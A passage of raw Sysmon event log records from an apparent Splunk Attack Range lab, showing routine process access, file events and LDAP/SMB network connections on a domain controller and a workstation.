08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.839{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98100C2B32CDC85CD86303E124025B03,SHA256=66E670FC97DEDFABFCDEEB7798B385ADA68247DB6F918E6A1413FA4DF48364A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810605Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:10.073{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42F9E5CFB07A66F8F28C10A9092DE9EF,SHA256=8AA2E5A8815CABF32C44594D56A1735FBE6B8CF8F64A1E95CE748B955BE06A6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:11.891{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CD77D678DEBE68D91C9D59B633B697A,SHA256=7F0E2C97A4996122AF26CA3A388B5FD4530E5E8D1148D68B7DACADA6316D6E45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810606Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:11.105{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB3204F55A78C19705D3C058A8D18D80,SHA256=78BFE71E4C1A2D8545703C1F06D8F5F8B57B3D9EE9B8BFAEB48071E7F3159148,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:11.539{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001055237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:12.922{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EBCDAA56138027E3BF01EE6632D18A8,SHA256=5808C555746F754A064E6B09B624766EB49C5BF4796AE6C5DDF95DBD86E6D665,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810608Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:10.300{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57481-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810607Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:12.105{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1211D3417B6950C3E77E87E0D8CF235,SHA256=9048F95C27ECCA430529390CEFF6569D108EF5D92D2A9F62D6E3821E111E5F4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:12.453{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=58A56A9D7E5E9457A8AFD4F771D6879E,SHA256=0155162BA88119DDD92BC3544E630FFCEDADBAAB20F655E164E59AC11246FE28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:13.952{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52A93FEA854CEA9273C2B9E838A8EC6F,SHA256=E47D936CB7BDE8826E783B1AE1FD10AF89037A62B6CA6CD1A5C07DD0D0C2F677,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810609Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:13.136{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAF4C9ECD5FE2FCA2EB816077339825A,SHA256=A1200FD7A8BD4EF3FB4EE62A9E7E843AD54E9611FF97C431924C6DD82D2D1AB9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:05.069{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61993-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001055243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:05.069{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61993-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001055242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:04.982{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local61992-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001055241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:04.982{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61992-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001055240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:04.967{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61991-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001055239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:04.967{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61991-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001055238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:04.710{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61990-false10.0.1.12-8000- 23542300x80000000000000001055246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:14.967{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29465E74D158A7F43406590FCA43BB8B,SHA256=ECB1935A5A68D4D92CC89684FC85D0C2EE905815F2A502CAFFAA874D4904B633,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810610Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:14.167{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BCF7AEA25CED801CE9E6D3913B9108A,SHA256=1B11E8811FFCE462296921E127C26F22264CB13A359E87921BBF8FBC33111E2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:15.988{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0C1256ADB09C8CF8A55F20E09806962,SHA256=0A04AB08450B7AF84BBCB3447ED1B0A2923C0E772178F013ED8DE36002C8BCBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810611Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:15.210{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB50EC7DA8CACE8973E1CD7C95D7279B,SHA256=A10854567D946F1A0FB41AD56FC6D41A1F0F548ED0ECB685E162857D0BC467A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.130{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61994-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001055248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.130{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61994-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001055247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:15.620{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EBC14FB52A0352AA2AD8EFB664D35515,SHA256=4750747C858960325AD5B12CC60C4C29EAEF7ACF3C5DAA35B1EB386712B04F7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810612Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:16.210{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17BDD962B4FB738DDCF1898076025AED,SHA256=7406F485B1DE9C17D1AF8F9FC3C5FEB3E666A714E66918A1DB4D4A88D03B68CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810614Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:17.226{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC26968317CF3F384EA2D917C1992CD8,SHA256=EF163607DE689AF9F263D0C91936CDD7F37BC7F30AA9ED0D2F5FA0D233ED763B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=60E5F9B0C18F4051052E08C897AD9A7C,SHA256=49141171C897AC3DF2CACB8E294C5EC7752C0479177DE193854D2F37FBE47EDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3A3E657B34758096AD3322A8A320A72C,SHA256=08F8E22E99F1654713944DB21B0AFBD46DFF4B5702F614AF965FA88E1A65019B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E2D6D89B67BDF820D4B6BF76C200BAE5,SHA256=65965AACB99FDF3F257A28FD683A4EC90A3A1D005ECDC1D501C9329DE6DD762D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 